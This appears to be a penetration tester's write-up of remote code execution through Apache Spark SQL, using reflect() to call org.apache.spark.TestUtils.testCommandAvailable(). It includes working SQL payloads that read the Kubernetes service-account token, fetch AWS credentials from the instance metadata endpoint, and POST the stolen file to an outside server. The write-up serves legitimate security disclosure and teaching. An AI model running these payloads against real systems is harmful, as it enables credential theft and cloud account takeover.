Remote Code Execution by Abusing Apache Spark SQL

While performing a security assessment of an application, I came across an interesting feature that allowed users to execute arbitrary Spark SQL queries over analytics data.

Vulnerability

The blog post "The Dangers of Untrusted Spark SQL Input in a Shared Environment" mentions two Spark SQL functions, reflect() and java_method(), that allow Java code to be executed. However, the usual java.lang.Runtime.getRuntime().exec() approach couldn't be used, because these functions can only call static methods. They can't instantiate a class or call a method on an object, and exec() is an instance method of the Runtime object returned by getRuntime(). I needed to find a Java class with a static method that would let me exploit the Spark SQL functionality.
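
To illustrate why the static-only restriction matters, here is a minimal Java sketch of a reflect()-style helper. It is a simplified model, not Spark's implementation (Spark implements reflect() in its CallMethodViaReflection expression and also accepts primitive argument types); the class name ReflectSketch and its String-only argument matching are assumptions made for brevity. It looks up a public static method by name, invokes it with a null receiver, and returns the result as a string.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Arrays;

public class ReflectSketch {

    // Hypothetical, simplified model of a reflect()-style call: it accepts only
    // String arguments and is NOT Spark's actual implementation.
    public static String reflect(String className, String methodName, String... args) {
        try {
            Class<?> cls = Class.forName(className);
            for (Method m : cls.getMethods()) {
                boolean nameMatches = m.getName().equals(methodName);
                boolean isStatic = Modifier.isStatic(m.getModifiers());
                boolean argsMatch = m.getParameterCount() == args.length
                        && Arrays.stream(m.getParameterTypes()).allMatch(t -> t == String.class);
                if (nameMatches && isStatic && argsMatch) {
                    // A null receiver is only valid for static methods.
                    Object result = m.invoke(null, (Object[]) args);
                    // The caller only ever gets a string back, never the object itself.
                    return String.valueOf(result);
                }
            }
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("reflective call failed", e);
        }
        throw new IllegalArgumentException(
                "no public static method " + className + "." + methodName
                        + " taking " + args.length + " String argument(s)");
    }

    public static void main(String[] argv) {
        System.out.println(reflect("java.lang.Integer", "parseInt", "42")); // prints 42
        // Static, so it is allowed, but the Runtime object is reduced to a string
        // such as java.lang.Runtime@1b6d3586 and cannot be used for a follow-up call.
        System.out.println(reflect("java.lang.Runtime", "getRuntime"));
        try {
            reflect("java.lang.Runtime", "exec", "ls"); // exec() is an instance method
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The step that matters is the last one: because the result is converted to a string, a call such as getRuntime() yields only text, so there is no object on which exec() could then be called.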

Using reflect(), I was able to retrieve environment variables and system properties with the queries below.

```sql
-- List environment variables
SELECT reflect('java.lang.System', 'getenv');

-- List system properties
SELECT reflect('java.lang.System', 'getProperties');
```

The environment variables and system properties returned didn't contain anything sensitive. However, the system properties revealed the Spark version in use, which later helped me achieve remote code execution.

Path to Exploitation

While reviewing the Spark JavaDocs, I discovered an interesting class, org.apache.spark.TestUtils, with a static method called testCommandAvailable().

Reviewing its source code on GitHub, I saw that the method calls Process(command).run(), which executes the supplied string as a system command.
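
The pattern is easy to reproduce outside Spark. Below is a hypothetical Java analogue of a command-availability probe (CommandProbeSketch is an illustrative name, not Spark code; the real TestUtils helper is written in Scala and uses scala.sys.process). As an assumption of this sketch, the command string is split on whitespace and started directly, without a shell. Because the probe works by running its argument, whoever controls that string controls what executes, and the caller learns only whether the exit code was zero.

```java
import java.io.IOException;

public class CommandProbeSketch {

    // Hypothetical probe: "is this command available?" answered by running it.
    public static boolean testCommandAvailable(String command) {
        try {
            // Split on whitespace and start the process directly (no shell involved),
            // discarding its output (Redirect.DISCARD requires Java 9+).
            Process p = new ProcessBuilder(command.trim().split("\\s+"))
                    .redirectErrorStream(true)
                    .redirectOutput(ProcessBuilder.Redirect.DISCARD)
                    .start();
            // Only the exit status reaches the caller, not the command's output.
            return p.waitFor() == 0;
        } catch (IOException e) {
            // The executable could not be started, e.g. it is not on the PATH.
            return false;
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(testCommandAvailable("true"));  // prints true on Unix-like systems
        System.out.println(testCommandAvailable("false")); // prints false
    }
}
```

A name like "test...Available" suggests a harmless check, but the check itself is the execution.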

I then built a Spark SQL payload that uses this class and method to execute system commands.



Using the following queries, I was able to disclose the client's Kubernetes API token and AWS keys, which had excessive permissions:

```sql
-- Read the Kubernetes API token file
SELECT * FROM csv.`/var/run/secrets/kubernetes.io/serviceaccount/token`;

-- Write the AWS keys to a file
SELECT reflect('org.apache.spark.TestUtils', 'testCommandAvailable', 'curl http://169.254.169.254/latest/meta-data/iam/security-credentials/euwe1-redacted -o /opt/test.txt');

-- Send the file contents to a remote server I control, to view them
SELECT reflect('org.apache.spark.TestUtils', 'testCommandAvailable', 'curl -X POST -F data=@/opt/test.txt http://remoteserver.stratumsecurity.com/test5.txt');
```



After obtaining their AWS keys and checking their permissions, I listed all the S3 buckets these keys had access to as a proof of concept for the report.